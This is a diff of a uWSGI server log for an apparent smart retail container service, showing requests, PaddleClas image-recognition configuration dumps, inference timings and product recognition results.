bytes} [Wed Nov 3 08:14:43 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 32/89] 106.12.223.202 () {36 vars in 488 bytes} [Wed Nov 3 08:14:44 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 49/90] 83.97.20.34 () {26 vars in 270 bytes} [Wed Nov 3 08:23:24 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 50/91] 106.12.223.204 () {36 vars in 488 bytes} [Wed Nov 3 08:29:23 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 33/92] 106.12.223.202 () {36 vars in 488 bytes} [Wed Nov 3 08:29:24 2021] GET / => generated 179 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 51/93] 106.12.223.202 () {36 vars in 488 bytes} [Wed Nov 3 08:42:31 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 34/94] 106.12.223.201 () {36 vars in 488 bytes} [Wed Nov 3 08:42:32 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 52/95] 106.12.223.201 () {36 vars in 488 bytes} [Wed Nov 3 08:56:50 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 35/96] 106.12.223.202 () {36 vars in 488 bytes} [Wed Nov 3 08:56:51 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 53/97] 210.51.42.187 () {40 vars in 739 bytes} [Wed Nov 3 09:00:57 2021] GET /record/ => generated 18 bytes in 1 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 36/98] 210.51.42.187 () {40 vars in 685 bytes} [Wed Nov 3 09:00:57 2021] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 54/99] 106.12.223.203 () {36 vars in 488 bytes} [Wed Nov 3 09:10:25 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 37/100] 106.12.223.201 () {36 vars in 488 bytes} [Wed Nov 3 09:10:26 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +["Please connect root to upload container's name and it's price!\n"] +[pid: 19148|app: 0|req: 1143/1345] 223.167.141.7 () {34 vars in 449 bytes} [Mon Feb 14 08:59:32 2022] POST /reference_client/ => generated 98 bytes in 2931 msecs (HTTP/1.1 200) 5 headers in 157 bytes (26 switches on core 0) req -2021-11-03 09:13:42 INFO: +2022-02-14 08:59:44 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle ! == =========================================================== @@ -3427,78 +5373,59 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 09:13:42 INFO: DetPostProcess : -2021-11-03 09:13:42 INFO: DetPreProcess : -2021-11-03 09:13:42 INFO: transform_ops : -2021-11-03 09:13:42 INFO: DetResize : -2021-11-03 09:13:42 INFO: interp : 2 -2021-11-03 09:13:42 INFO: keep_ratio : False -2021-11-03 09:13:42 INFO: target_size : [640, 640] -2021-11-03 09:13:42 INFO: DetNormalizeImage : -2021-11-03 09:13:42 INFO: is_scale : True -2021-11-03 09:13:42 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 09:13:42 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 09:13:42 INFO: DetPermute : -2021-11-03 09:13:42 INFO: Global : -2021-11-03 09:13:42 INFO: batch_size : 1 -2021-11-03 09:13:42 INFO: cpu_num_threads : 10 -2021-11-03 09:13:42 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 09:13:42 INFO: enable_benchmark : True -2021-11-03 09:13:42 INFO: enable_mkldnn : True -2021-11-03 09:13:42 INFO: enable_profile : False -2021-11-03 09:13:42 INFO: gpu_mem : 8000 -2021-11-03 09:13:42 INFO: image_shape : [3, 640, 640] -2021-11-03 09:13:42 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 09:13:42 INFO: ir_optim : True -2021-11-03 09:13:42 INFO: labe_list : ['foreground'] -2021-11-03 09:13:42 INFO: max_det_results : 5 -2021-11-03 09:13:42 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 09:13:42 INFO: rec_nms_thresold : 0.05 -2021-11-03 09:13:42 INFO: threshold : 0.2 -2021-11-03 09:13:42 INFO: use_fp16 : False -2021-11-03 09:13:42 INFO: use_gpu : False -2021-11-03 09:13:42 INFO: use_tensorrt : False -2021-11-03 09:13:42 INFO: IndexProcess : -2021-11-03 09:13:42 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 09:13:42 INFO: return_k : 5 -2021-11-03 09:13:42 INFO: score_thres : 0.5 -2021-11-03 09:13:42 INFO: RecPostProcess : None -2021-11-03 09:13:42 INFO: RecPreProcess : -2021-11-03 09:13:42 INFO: transform_ops : -2021-11-03 09:13:42 INFO: ResizeImage : -2021-11-03 09:13:42 INFO: size : 224 -2021-11-03 09:13:42 INFO: NormalizeImage : -2021-11-03 09:13:42 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 09:13:42 INFO: order : -2021-11-03 09:13:42 INFO: scale : 0.00392157 -2021-11-03 09:13:42 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 09:13:42 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2355.2846908569336 ms per batch image -[{'bbox': [0, 0, 640, 480], 'rec_docs': '江小白', 'rec_scores': 0.65080917}] -{'bbox': [0, 0, 640, 480], 'rec_docs': '江小白', 'rec_scores': 0.65080917} +2022-02-14 08:59:44 INFO: DetPostProcess : +2022-02-14 08:59:44 INFO: DetPreProcess : +2022-02-14 08:59:44 INFO: transform_ops : +2022-02-14 08:59:44 INFO: DetResize : +2022-02-14 08:59:44 INFO: interp : 2 +2022-02-14 08:59:44 INFO: keep_ratio : False +2022-02-14 08:59:44 INFO: target_size : [640, 640] +2022-02-14 08:59:44 INFO: DetNormalizeImage : +2022-02-14 08:59:44 INFO: is_scale : True +2022-02-14 08:59:44 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 08:59:44 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 08:59:44 INFO: DetPermute : +2022-02-14 08:59:44 INFO: Global : +2022-02-14 08:59:44 INFO: batch_size : 1 +2022-02-14 08:59:44 INFO: cpu_num_threads : 1 +2022-02-14 08:59:44 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-14 08:59:44 INFO: enable_benchmark : True +2022-02-14 08:59:44 INFO: enable_mkldnn : True +2022-02-14 08:59:44 INFO: enable_profile : False +2022-02-14 08:59:44 INFO: gpu_mem : 8000 +2022-02-14 08:59:44 INFO: image_shape : [3, 640, 640] +2022-02-14 08:59:44 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-14 08:59:44 INFO: ir_optim : True +2022-02-14 08:59:44 INFO: labe_list : ['foreground'] +2022-02-14 08:59:44 INFO: max_det_results : 5 +2022-02-14 08:59:44 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-14 08:59:44 INFO: rec_nms_thresold : 0.05 +2022-02-14 08:59:44 INFO: threshold : 0.2 +2022-02-14 08:59:44 INFO: use_fp16 : False +2022-02-14 08:59:44 INFO: use_gpu : False +2022-02-14 08:59:44 INFO: use_tensorrt : False +2022-02-14 08:59:44 INFO: IndexProcess : +2022-02-14 08:59:44 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-14 08:59:44 INFO: return_k : 5 +2022-02-14 08:59:44 INFO: score_thres : 0.5 +2022-02-14 08:59:44 INFO: RecPostProcess : None +2022-02-14 08:59:44 INFO: RecPreProcess : +2022-02-14 08:59:44 INFO: transform_ops : +2022-02-14 08:59:44 INFO: ResizeImage : +2022-02-14 08:59:44 INFO: size : 224 +2022-02-14 08:59:44 INFO: NormalizeImage : +2022-02-14 08:59:44 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 08:59:44 INFO: order : +2022-02-14 08:59:44 INFO: scale : 0.00392157 +2022-02-14 08:59:44 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 08:59:44 INFO: ToCHWImage : None +Inference: 372.7452754974365 ms per batch image +[] 234 -["{'bbox': [0, 0, 640, 480], 'rec_docs': '江小白', 'rec_scores': 0.65080917}\n"] -['江小白'] -['江小白', '30'] -[pid: 32765|app: 0|req: 55/101] 210.51.42.176 () {34 vars in 432 bytes} [Wed Nov 3 09:13:35 2021] POST /reference_client/ => generated 114 bytes in 11674 msecs (HTTP/1.1 200) 5 headers in 158 bytes (15 switches on core 0) +["Please connect root to upload container's name and it's price!\n"] +[pid: 19148|app: 0|req: 1144/1346] 223.167.141.7 () {34 vars in 448 bytes} [Mon Feb 14 08:59:43 2022] POST /reference_client/ => generated 98 bytes in 2877 msecs (HTTP/1.1 200) 5 headers in 157 bytes (18 switches on core 0) req -2021-11-03 09:14:06 INFO: +2022-02-14 09:11:17 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle ! == =========================================================== @@ -3508,76 +5435,1652 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 09:14:06 INFO: DetPostProcess : -2021-11-03 09:14:06 INFO: DetPreProcess : -2021-11-03 09:14:06 INFO: transform_ops : -2021-11-03 09:14:06 INFO: DetResize : -2021-11-03 09:14:06 INFO: interp : 2 -2021-11-03 09:14:06 INFO: keep_ratio : False -2021-11-03 09:14:06 INFO: target_size : [640, 640] -2021-11-03 09:14:06 INFO: DetNormalizeImage : -2021-11-03 09:14:06 INFO: is_scale : True -2021-11-03 09:14:06 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 09:14:06 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 09:14:06 INFO: DetPermute : -2021-11-03 09:14:06 INFO: Global : -2021-11-03 09:14:06 INFO: batch_size : 1 -2021-11-03 09:14:06 INFO: cpu_num_threads : 10 -2021-11-03 09:14:06 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 09:14:06 INFO: enable_benchmark : True -2021-11-03 09:14:06 INFO: enable_mkldnn : True -2021-11-03 09:14:06 INFO: enable_profile : False -2021-11-03 09:14:06 INFO: gpu_mem : 8000 -2021-11-03 09:14:06 INFO: image_shape : [3, 640, 640] -2021-11-03 09:14:06 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 09:14:06 INFO: ir_optim : True -2021-11-03 09:14:06 INFO: labe_list : ['foreground'] -2021-11-03 09:14:06 INFO: max_det_results : 5 -2021-11-03 09:14:06 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 09:14:06 INFO: rec_nms_thresold : 0.05 -2021-11-03 09:14:06 INFO: threshold : 0.2 -2021-11-03 09:14:06 INFO: use_fp16 : False -2021-11-03 09:14:06 INFO: use_gpu : False -2021-11-03 09:14:06 INFO: use_tensorrt : False -2021-11-03 09:14:06 INFO: IndexProcess : -2021-11-03 09:14:06 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 09:14:06 INFO: return_k : 5 -2021-11-03 09:14:06 INFO: score_thres : 0.5 -2021-11-03 09:14:06 INFO: RecPostProcess : None -2021-11-03 09:14:06 INFO: RecPreProcess : -2021-11-03 09:14:06 INFO: transform_ops : -2021-11-03 09:14:06 INFO: ResizeImage : -2021-11-03 09:14:06 INFO: size : 224 -2021-11-03 09:14:06 INFO: NormalizeImage : -2021-11-03 09:14:06 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 09:14:06 INFO: order : -2021-11-03 09:14:06 INFO: scale : 0.00392157 -2021-11-03 09:14:06 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 09:14:06 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2446.4921951293945 ms per batch image -[{'bbox': [56, 54, 467, 479], 'rec_docs': '江小白', 'rec_scores': 0.655632}] -{'bbox': [56, 54, 467, 479], 'rec_docs': '江小白', 'rec_scores': 0.655632} +2022-02-14 09:11:17 INFO: DetPostProcess : +2022-02-14 09:11:17 INFO: DetPreProcess : +2022-02-14 09:11:17 INFO: transform_ops : +2022-02-14 09:11:17 INFO: DetResize : +2022-02-14 09:11:17 INFO: interp : 2 +2022-02-14 09:11:17 INFO: keep_ratio : False +2022-02-14 09:11:17 INFO: target_size : [640, 640] +2022-02-14 09:11:17 INFO: DetNormalizeImage : +2022-02-14 09:11:17 INFO: is_scale : True +2022-02-14 09:11:17 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 09:11:17 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 09:11:17 INFO: DetPermute : +2022-02-14 09:11:17 INFO: Global : +2022-02-14 09:11:17 INFO: batch_size : 1 +2022-02-14 09:11:17 INFO: cpu_num_threads : 1 +2022-02-14 09:11:17 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-14 09:11:17 INFO: enable_benchmark : True +2022-02-14 09:11:17 INFO: enable_mkldnn : True +2022-02-14 09:11:17 INFO: enable_profile : False +2022-02-14 09:11:17 INFO: gpu_mem : 8000 +2022-02-14 09:11:17 INFO: image_shape : [3, 640, 640] +2022-02-14 09:11:17 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-14 09:11:17 INFO: ir_optim : True +2022-02-14 09:11:17 INFO: labe_list : ['foreground'] +2022-02-14 09:11:17 INFO: max_det_results : 5 +2022-02-14 09:11:17 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-14 09:11:17 INFO: rec_nms_thresold : 0.05 +2022-02-14 09:11:17 INFO: threshold : 0.2 +2022-02-14 09:11:17 INFO: use_fp16 : False +2022-02-14 09:11:17 INFO: use_gpu : False +2022-02-14 09:11:17 INFO: use_tensorrt : False +2022-02-14 09:11:17 INFO: IndexProcess : +2022-02-14 09:11:17 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-14 09:11:17 INFO: return_k : 5 +2022-02-14 09:11:17 INFO: score_thres : 0.5 +2022-02-14 09:11:17 INFO: RecPostProcess : None +2022-02-14 09:11:17 INFO: RecPreProcess : +2022-02-14 09:11:17 INFO: transform_ops : +2022-02-14 09:11:17 INFO: ResizeImage : +2022-02-14 09:11:17 INFO: size : 224 +2022-02-14 09:11:17 INFO: NormalizeImage : +2022-02-14 09:11:17 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 09:11:17 INFO: order : +2022-02-14 09:11:17 INFO: scale : 0.00392157 +2022-02-14 09:11:17 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 09:11:17 INFO: ToCHWImage : None +Inference: 373.11553955078125 ms per batch image +[] 234 -["{'bbox': [56, 54, 467, 479], 'rec_docs': '江小白', 'rec_scores': 0.655632}\n"] -['江小白'] -['江小白', '30'] -[pid: 32766|app: 0|req: 38/102] 210.51.42.176 () {34 vars in 431 bytes} [Wed Nov 3 09:14:01 2021] POST /reference_client/ => generated 114 bytes in 10161 msecs (HTTP/1.1 200) 5 headers in 158 bytes (22 switches on core 0) -[pid: 32765|app: 0|req: 56/103] 106.12.223.200 () {36 vars in 488 bytes} [Wed Nov 3 09:25:17 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 39/104] 106.12.223.203 () {36 vars in 488 bytes} [Wed Nov 3 09:25:18 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 57/105] 210.51.42.187 () {40 vars in 690 bytes} [Wed Nov 3 09:30:50 2021] GET /favicon.ico => generated 179 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +["Please connect root to upload container's name and it's price!\n"] +[pid: 19148|app: 0|req: 1145/1347] 223.167.141.7 () {34 vars in 448 bytes} [Mon Feb 14 09:11:16 2022] POST /reference_client/ => generated 98 bytes in 3011 msecs (HTTP/1.1 200) 5 headers in 157 bytes (29 switches on core 0) +req +2022-02-14 09:11:33 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-14 09:11:33 INFO: DetPostProcess : +2022-02-14 09:11:33 INFO: DetPreProcess : +2022-02-14 09:11:33 INFO: transform_ops : +2022-02-14 09:11:33 INFO: DetResize : +2022-02-14 09:11:33 INFO: interp : 2 +2022-02-14 09:11:33 INFO: keep_ratio : False +2022-02-14 09:11:33 INFO: target_size : [640, 640] +2022-02-14 09:11:33 INFO: DetNormalizeImage : +2022-02-14 09:11:33 INFO: is_scale : True +2022-02-14 09:11:33 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 09:11:33 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 09:11:33 INFO: DetPermute : +2022-02-14 09:11:33 INFO: Global : +2022-02-14 09:11:33 INFO: batch_size : 1 +2022-02-14 09:11:33 INFO: cpu_num_threads : 1 +2022-02-14 09:11:33 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-14 09:11:33 INFO: enable_benchmark : True +2022-02-14 09:11:33 INFO: enable_mkldnn : True +2022-02-14 09:11:33 INFO: enable_profile : False +2022-02-14 09:11:33 INFO: gpu_mem : 8000 +2022-02-14 09:11:33 INFO: image_shape : [3, 640, 640] +2022-02-14 09:11:33 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-14 09:11:33 INFO: ir_optim : True +2022-02-14 09:11:33 INFO: labe_list : ['foreground'] +2022-02-14 09:11:33 INFO: max_det_results : 5 +2022-02-14 09:11:33 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-14 09:11:33 INFO: rec_nms_thresold : 0.05 +2022-02-14 09:11:33 INFO: threshold : 0.2 +2022-02-14 09:11:33 INFO: use_fp16 : False +2022-02-14 09:11:33 INFO: use_gpu : False +2022-02-14 09:11:33 INFO: use_tensorrt : False +2022-02-14 09:11:33 INFO: IndexProcess : +2022-02-14 09:11:33 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-14 09:11:33 INFO: return_k : 5 +2022-02-14 09:11:33 INFO: score_thres : 0.5 +2022-02-14 09:11:33 INFO: RecPostProcess : None +2022-02-14 09:11:33 INFO: RecPreProcess : +2022-02-14 09:11:33 INFO: transform_ops : +2022-02-14 09:11:33 INFO: ResizeImage : +2022-02-14 09:11:33 INFO: size : 224 +2022-02-14 09:11:33 INFO: NormalizeImage : +2022-02-14 09:11:33 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 09:11:33 INFO: order : +2022-02-14 09:11:33 INFO: scale : 0.00392157 +2022-02-14 09:11:33 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 09:11:33 INFO: ToCHWImage : None +Inference: 381.8855285644531 ms per batch image +[] +234 +["Please connect root to upload container's name and it's price!\n"] +[pid: 19148|app: 0|req: 1146/1348] 223.167.141.7 () {34 vars in 448 bytes} [Mon Feb 14 09:11:32 2022] POST /reference_client/ => generated 98 bytes in 3026 msecs (HTTP/1.1 200) 5 headers in 157 bytes (19 switches on core 0) +req +2022-02-14 09:11:40 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-14 09:11:40 INFO: DetPostProcess : +2022-02-14 09:11:40 INFO: DetPreProcess : +2022-02-14 09:11:40 INFO: transform_ops : +2022-02-14 09:11:40 INFO: DetResize : +2022-02-14 09:11:40 INFO: interp : 2 +2022-02-14 09:11:40 INFO: keep_ratio : False +2022-02-14 09:11:40 INFO: target_size : [640, 640] +2022-02-14 09:11:40 INFO: DetNormalizeImage : +2022-02-14 09:11:40 INFO: is_scale : True +2022-02-14 09:11:40 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 09:11:40 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 09:11:40 INFO: DetPermute : +2022-02-14 09:11:40 INFO: Global : +2022-02-14 09:11:40 INFO: batch_size : 1 +2022-02-14 09:11:40 INFO: cpu_num_threads : 1 +2022-02-14 09:11:40 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-14 09:11:40 INFO: enable_benchmark : True +2022-02-14 09:11:40 INFO: enable_mkldnn : True +2022-02-14 09:11:40 INFO: enable_profile : False +2022-02-14 09:11:40 INFO: gpu_mem : 8000 +2022-02-14 09:11:40 INFO: image_shape : [3, 640, 640] +2022-02-14 09:11:40 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-14 09:11:40 INFO: ir_optim : True +2022-02-14 09:11:40 INFO: labe_list : ['foreground'] +2022-02-14 09:11:40 INFO: max_det_results : 5 +2022-02-14 09:11:40 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-14 09:11:40 INFO: rec_nms_thresold : 0.05 +2022-02-14 09:11:40 INFO: threshold : 0.2 +2022-02-14 09:11:40 INFO: use_fp16 : False +2022-02-14 09:11:40 INFO: use_gpu : False +2022-02-14 09:11:40 INFO: use_tensorrt : False +2022-02-14 09:11:40 INFO: IndexProcess : +2022-02-14 09:11:40 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-14 09:11:40 INFO: return_k : 5 +2022-02-14 09:11:40 INFO: score_thres : 0.5 +2022-02-14 09:11:40 INFO: RecPostProcess : None +2022-02-14 09:11:40 INFO: RecPreProcess : +2022-02-14 09:11:40 INFO: transform_ops : +2022-02-14 09:11:40 INFO: ResizeImage : +2022-02-14 09:11:40 INFO: size : 224 +2022-02-14 09:11:40 INFO: NormalizeImage : +2022-02-14 09:11:40 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 09:11:40 INFO: order : +2022-02-14 09:11:40 INFO: scale : 0.00392157 +2022-02-14 09:11:40 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 09:11:40 INFO: ToCHWImage : None +Inference: 383.95237922668457 ms per batch image +[] +234 +["Please connect root to upload container's name and it's price!\n"] +[pid: 19148|app: 0|req: 1147/1349] 223.167.141.7 () {34 vars in 448 bytes} [Mon Feb 14 09:11:39 2022] POST /reference_client/ => generated 98 bytes in 3023 msecs (HTTP/1.1 200) 5 headers in 157 bytes (16 switches on core 0) +req +2022-02-14 09:11:50 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-14 09:11:50 INFO: DetPostProcess : +2022-02-14 09:11:50 INFO: DetPreProcess : +2022-02-14 09:11:50 INFO: transform_ops : +2022-02-14 09:11:50 INFO: DetResize : +2022-02-14 09:11:50 INFO: interp : 2 +2022-02-14 09:11:50 INFO: keep_ratio : False +2022-02-14 09:11:50 INFO: target_size : [640, 640] +2022-02-14 09:11:50 INFO: DetNormalizeImage : +2022-02-14 09:11:50 INFO: is_scale : True +2022-02-14 09:11:50 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 09:11:50 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 09:11:50 INFO: DetPermute : +2022-02-14 09:11:50 INFO: Global : +2022-02-14 09:11:50 INFO: batch_size : 1 +2022-02-14 09:11:50 INFO: cpu_num_threads : 1 +2022-02-14 09:11:50 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-14 09:11:50 INFO: enable_benchmark : True +2022-02-14 09:11:50 INFO: enable_mkldnn : True +2022-02-14 09:11:50 INFO: enable_profile : False +2022-02-14 09:11:50 INFO: gpu_mem : 8000 +2022-02-14 09:11:50 INFO: image_shape : [3, 640, 640] +2022-02-14 09:11:50 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-14 09:11:50 INFO: ir_optim : True +2022-02-14 09:11:50 INFO: labe_list : ['foreground'] +2022-02-14 09:11:50 INFO: max_det_results : 5 +2022-02-14 09:11:50 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-14 09:11:50 INFO: rec_nms_thresold : 0.05 +2022-02-14 09:11:50 INFO: threshold : 0.2 +2022-02-14 09:11:50 INFO: use_fp16 : False +2022-02-14 09:11:50 INFO: use_gpu : False +2022-02-14 09:11:50 INFO: use_tensorrt : False +2022-02-14 09:11:50 INFO: IndexProcess : +2022-02-14 09:11:50 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-14 09:11:50 INFO: return_k : 5 +2022-02-14 09:11:50 INFO: score_thres : 0.5 +2022-02-14 09:11:50 INFO: RecPostProcess : None +2022-02-14 09:11:50 INFO: RecPreProcess : +2022-02-14 09:11:50 INFO: transform_ops : +2022-02-14 09:11:50 INFO: ResizeImage : +2022-02-14 09:11:50 INFO: size : 224 +2022-02-14 09:11:50 INFO: NormalizeImage : +2022-02-14 09:11:50 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 09:11:50 INFO: order : +2022-02-14 09:11:50 INFO: scale : 0.00392157 +2022-02-14 09:11:50 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 09:11:50 INFO: ToCHWImage : None +Inference: 381.49380683898926 ms per batch image +[] +234 +["Please connect root to upload container's name and it's price!\n"] +[pid: 19148|app: 0|req: 1148/1350] 223.167.141.7 () {34 vars in 449 bytes} [Mon Feb 14 09:11:48 2022] POST /reference_client/ => generated 98 bytes in 3001 msecs (HTTP/1.1 200) 5 headers in 157 bytes (18 switches on core 0) +[pid: 19148|app: 0|req: 1149/1351] 223.167.141.7 () {36 vars in 760 bytes} [Mon Feb 14 09:13:29 2022] GET /reference_client/ => generated 18 bytes in 1 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1150/1352] 223.167.141.7 () {36 vars in 701 bytes} [Mon Feb 14 09:13:29 2022] GET /favicon.ico => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +req +2022-02-14 09:17:15 INFO: 